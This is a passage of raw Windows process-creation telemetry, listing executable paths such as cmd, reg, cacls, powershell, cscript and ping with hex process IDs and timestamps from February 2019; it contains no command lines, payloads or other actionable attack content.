03:45:34.260000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1ce42019-02-10 03:45:34.270000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1be02019-02-10 03:45:34.290000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xd742019-02-10 03:45:34.317000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1d442019-02-10 03:45:34.330000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x48c2019-02-10 03:45:34.547000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x19f02019-02-10 03:45:34.560000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x5c42019-02-10 03:45:34.583000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1db42019-02-10 03:45:34.633000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x12cc2019-02-10 03:45:47.757000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1df82019-02-10 03:45:47.787000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x1ff82019-02-10 03:46:17.050000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd782019-02-10 03:46:17.073000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xdd02019-02-10 03:46:32.210000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12f82019-02-10 03:46:32.243000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xf942019-02-10 03:46:57.410000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1eb42019-02-10 03:46:57.427000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x582019-02-10 03:47:08.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x135c2019-02-10 03:47:08.527000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1b282019-02-10 03:47:13.587000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1e602019-02-10 03:47:13.610000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xf902019-02-10 03:47:13.623000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5082019-02-10 03:47:13.637000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x21b02019-02-10 03:47:36.837000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x4942019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x3782019-02-10 03:47:37.793000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x21682019-02-10 03:47:37.810000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x2542019-02-10 03:47:37.827000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x23282019-02-10 03:48:01.003000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18342019-02-10 03:48:01.020000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xcc02019-02-10 03:48:24.217000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x15f82019-02-10 03:48:24.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1f7c2019-02-10 03:48:48.320000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22742019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x22fc2019-02-10 03:48:49.287000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x15c02019-02-10 03:48:49.297000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x19c82019-02-10 03:48:49.317000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x19e82019-02-10 03:48:49.327000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xf982019-02-10 03:48:49.350000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xbbc2019-02-10 03:48:49.370000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb702019-02-10 03:48:49.387000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x15902019-02-10 03:48:49.400000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x22982019-02-10 03:48:49.417000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xe582019-02-10 03:48:49.433000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x15e42019-02-10 03:48:49.447000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1f002019-02-10 03:48:49.463000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x23842019-02-10 03:48:49.477000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xa242019-02-10 03:48:49.490000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10702019-02-10 03:48:49.557000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1df42019-02-10 03:49:12.813000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20442019-02-10 03:49:12.843000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x15202019-02-10 03:49:36.040000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xedc2019-02-10 03:49:36.060000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x16342019-02-10 03:49:59.250000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1b282019-02-10 03:49:59.270000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xd7c2019-02-10 03:50:22.487000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x182c2019-02-10 03:50:22.503000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x20702019-02-10 03:50:45.727000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1f2c2019-02-10 03:50:45.753000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x6f82019-02-10 03:51:08.927000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10c42019-02-10 03:51:08.957000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x1de42019-02-10 03:51:32.143000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5ac2019-02-10 03:51:32.160000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x8642019-02-10 03:51:55.353000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5182019-02-10 03:51:56.143000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1d442019-02-10 03:52:19.353000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x48c2019-02-10 03:52:19.367000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xb102019-02-10 03:52:42.607000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5c42019-02-10 03:52:42.633000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x23ec2019-02-10 03:53:05.823000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xde42019-02-10 03:53:05.887000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x20e42019-02-10 03:53:15.997000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x8382019-02-10 03:53:16.010000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x19142019-02-10 03:53:35.160000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18602019-02-10 03:53:35.183000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1f7c2019-02-10 03:53:45.243000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe0x14542019-02-10 04:08:29.150000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x7c02019-02-10 04:08:29.163000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe0x18442019-02-10 04:08:35.177000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x9002019-02-10 04:08:35.183000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x22c02019-02-10 04:28:02.247000\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe0x1ef42019-02-10 04:32:15.793000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x11ec2019-02-10 04:32:15.800000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x1d3c2019-02-10 05:10:21.810000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x20102019-02-10 05:10:21.820000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1fa42019-02-10 05:28:02.243000\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe0x195c2019-02-10 06:00:00.807000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x6002019-02-10 06:21:59.853000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0xc602019-02-10 06:28:02.250000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe0x1ce82019-02-10 06:33:53.853000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13e02019-02-10 06:44:47.247000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x7702019-02-10 06:44:47.267000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xb702019-02-10 06:44:47.457000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1f842019-02-10 06:44:47.470000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xed82019-02-10 06:44:47.490000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x21b42019-02-10 06:44:59.583000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19982019-02-10 06:44:59.600000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x22042019-02-10 06:45:17.783000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21b02019-02-10 06:45:17.803000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x5942019-02-10 06:45:21.867000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17e02019-02-10 06:45:22.657000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22b02019-02-10 06:45:22.820000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xa2c2019-02-10 06:45:22.837000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x1a002019-02-10 06:45:22.850000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x3c42019-02-10 06:45:22.867000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1de42019-02-10 06:45:22.897000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x21782019-02-10 06:45:23.110000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x9802019-02-10 06:45:23.133000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1fe02019-02-10 06:45:23.167000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1fa42019-02-10 06:45:23.190000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x14ec2019-02-10 06:45:23.203000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xcc82019-02-10 06:45:23.223000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xfcc2019-02-10 06:45:23.247000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x12802019-02-10 06:45:23.260000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x6f82019-02-10 06:45:23.473000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1a5c2019-02-10 06:45:23.487000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8bc2019-02-10 06:45:23.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13e42019-02-10 06:45:23.563000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1f602019-02-10 06:45:30.647000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10a42019-02-10 06:45:30.673000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x107c2019-02-10 06:45:32.707000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21302019-02-10 06:45:32.730000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x13382019-02-10 06:45:48.870000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xc682019-02-10 06:45:48.900000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x21d42019-02-10 06:45:49.933000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xa942019-02-10 06:45:49.943000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x8f02019-02-10 06:46:18.190000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1c202019-02-10 06:46:18.213000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x10bc2019-02-10 06:46:47.443000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12cc2019-02-10 06:46:47.473000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x13a82019-02-10 06:47:03.633000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb482019-02-10 06:47:03.653000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x23d82019-02-10 06:47:24.843000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x14802019-02-10 06:47:25.650000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x15fc2019-02-10 06:47:25.823000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x22982019-02-10 06:47:25.847000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1a442019-02-10 06:47:25.863000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x21b42019-02-10 06:47:47.063000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19282019-02-10 06:47:47.080000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0xdd82019-02-10 06:48:08.300000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x14882019-02-10 06:48:08.320000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1fa42019-02-10 06:48:29.533000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x8502019-02-10 06:48:29.587000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x18982019-02-10 06:48:51.690000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21202019-02-10 06:48:51.720000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x8542019-02-10 06:49:12.923000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x91c2019-02-10 06:49:12.947000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x22f42019-02-10 06:49:34.150000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb642019-02-10 06:49:34.180000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1a9c2019-02-10 06:49:55.360000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17d02019-02-10 06:49:55.377000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x17d82019-02-10 06:50:16.557000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd142019-02-10 06:50:16.580000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x128c2019-02-10 06:50:37.767000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb042019-02-10 06:50:37.800000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x1c202019-02-10 06:50:58.953000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13602019-02-10 06:50:58.973000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x19f02019-02-10 06:51:20.183000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1db02019-02-10 06:51:20.220000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb602019-02-10 06:51:41.387000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x125c2019-02-10 06:51:41.400000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x15902019-02-10 06:52:02.617000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x11a82019-02-10 06:52:02.650000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x19142019-02-10 06:52:23.833000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10582019-02-10 06:52:23.903000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x15182019-02-10 06:52:48.113000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5a82019-02-10 06:52:48.127000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x53c2019-02-10 06:53:19.340000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13942019-02-10 06:53:19.367000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x8382019-02-10 06:53:20.400000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x15a82019-02-10 07:28:02.247000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1cdc2019-02-10 08:28:02.253000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe0x19482019-02-10 09:07:02.863000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe0x6342019-02-10 09:13:15.373000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1e8c2019-02-10 09:13:15.387000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x181c2019-02-10 09:28:02.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1b502019-02-10 09:44:47.247000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1e682019-02-10 09:44:47.263000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23482019-02-10 09:44:47.453000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x125c2019-02-10 09:44:47.467000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13742019-02-10 09:44:47.483000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xd582019-02-10 09:45:02.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x22302019-02-10 09:45:02.660000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x13c02019-02-10 09:45:21.823000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x4e02019-02-10 09:45:21.843000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x12e02019-02-10 09:45:45.050000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe002019-02-10 09:45:45.963000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xbd02019-02-10 09:45:46.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe582019-02-10 09:45:46.153000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x18502019-02-10 09:45:46.167000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x23ec2019-02-10 09:45:46.190000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x16f42019-02-10 09:45:46.210000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1b742019-02-10 09:45:46.247000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x12d02019-02-10 09:45:46.273000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x16102019-02-10 09:45:46.290000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x6482019-02-10 09:45:46.313000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x23b82019-02-10 09:45:46.323000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xf542019-02-10 09:45:46.347000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x20b02019-02-10 09:45:46.370000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1dec2019-02-10 09:45:46.383000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1bbc2019-02-10 09:45:46.417000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xa242019-02-10 09:45:46.430000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x16bc2019-02-10 09:45:46.447000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xf802019-02-10 09:45:46.500000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xf082019-02-10 09:45:48.530000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xe502019-02-10 09:45:48.553000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x4902019-02-10 09:45:57.637000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xa582019-02-10 09:45:57.657000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1b002019-02-10 09:46:15.813000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23a42019-02-10 09:46:15.843000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1d9c2019-02-10 09:46:24.933000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13982019-02-10 09:46:24.950000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xb282019-02-10 09:46:37.050000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21642019-02-10 09:46:37.080000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x11982019-02-10 09:46:58.260000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd042019-02-10 09:46:58.290000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xce02019-02-10 09:46:58.310000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x3b82019-02-10 09:46:58.327000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1f602019-02-10 09:47:17.517000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe082019-02-10 09:47:18.343000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x10ac2019-02-10 09:47:18.497000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xb382019-02-10 09:47:18.510000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x14802019-02-10 09:47:18.533000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xe2c2019-02-10 09:47:37.713000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18602019-02-10 09:47:37.730000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x20482019-02-10 09:47:56.887000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x128c2019-02-10 09:47:56.907000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xed82019-02-10 09:48:16.107000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x107c2019-02-10 09:48:16.877000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x13f82019-02-10 09:48:36.487000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x19402019-02-10 09:48:36.513000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x212c2019-02-10 09:48:55.927000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1f882019-02-10 09:48:55.947000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xbd02019-02-10 09:49:15.120000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x4382019-02-10 09:49:15.143000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xbd82019-02-10 09:49:34.323000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x115c2019-02-10 09:49:34.340000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x203c2019-02-10 09:49:53.497000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x21b02019-02-10 09:49:53.520000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x23282019-02-10 09:50:12.667000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1b282019-02-10 09:50:12.697000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0xfe02019-02-10 09:50:31.897000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x2582019-02-10 09:50:31.913000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x7702019-02-10 09:50:51.110000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x84c2019-02-10 09:50:51.897000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x2482019-02-10 09:51:11.057000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20182019-02-10 09:51:11.070000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xd702019-02-10 09:51:30.233000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xccc2019-02-10 09:51:30.253000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x16802019-02-10 09:51:49.427000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12602019-02-10 09:51:49.493000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x23f82019-02-10 09:51:54.560000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1bb42019-02-10 09:51:54.577000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xcfc2019-02-10 09:52:04.690000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xdd82019-02-10 09:52:04.717000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x14082019-02-10 09:52:29.923000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1ce82019-02-10 10:28:02.243000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1d082019-02-10 11:28:02.237000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x11782019-02-10 11:46:27.867000\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe0x1dd82019-02-10 12:00:00.817000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x10c42019-02-10 12:28:02.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x8f82019-02-10 12:44:47.253000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x20182019-02-10 12:44:47.440000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17ec2019-02-10 12:44:47.453000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5942019-02-10 12:44:47.473000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x1f882019-02-10 12:45:04.610000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x14d82019-02-10 12:45:04.627000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x1b282019-02-10 12:45:24.803000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xfc02019-02-10 12:45:24.827000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xfc82019-02-10 12:45:34.933000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x23a82019-02-10 12:45:35.877000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16802019-02-10 12:45:35.893000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x23e82019-02-10 12:45:35.910000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x55c2019-02-10 12:45:35.923000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xadc2019-02-10 12:45:35.943000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x13982019-02-10 12:45:36.087000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x17502019-02-10 12:45:36.113000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x11f02019-02-10 12:45:36.143000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x5ac2019-02-10 12:45:36.163000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xa902019-02-10 12:45:36.190000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xc4c2019-02-10 12:45:36.203000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xb002019-02-10 12:45:36.230000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x154c2019-02-10 12:45:36.257000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xeb02019-02-10 12:45:36.280000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x9602019-02-10 12:45:36.440000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x158c2019-02-10 12:45:36.470000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x1be02019-02-10 12:45:36.483000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x2dc2019-02-10 12:45:36.507000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x221c2019-02-10 12:45:36.563000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xc982019-02-10 12:46:05.810000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x2482019-02-10 12:46:05.843000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x18782019-02-10 12:46:22.017000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x84c2019-02-10 12:46:22.033000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x18982019-02-10 12:46:42.207000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6c02019-02-10 12:46:42.237000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x125c2019-02-10 12:46:59.397000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13742019-02-10 12:46:59.413000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0xf582019-02-10 12:47:28.643000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x67c2019-02-10 12:47:28.670000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xefc2019-02-10 12:47:41.780000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13d82019-02-10 12:47:41.813000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x19e82019-02-10 12:47:57.960000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x7fc2019-02-10 12:47:57.977000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x107c2019-02-10 12:48:15.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x19f42019-02-10 12:48:16.093000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x20202019-02-10 12:48:16.107000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x9182019-02-10 12:48:16.123000\",\"c:\\\\windows\\\\system32\\\\reg.exe0xf202019-02-10 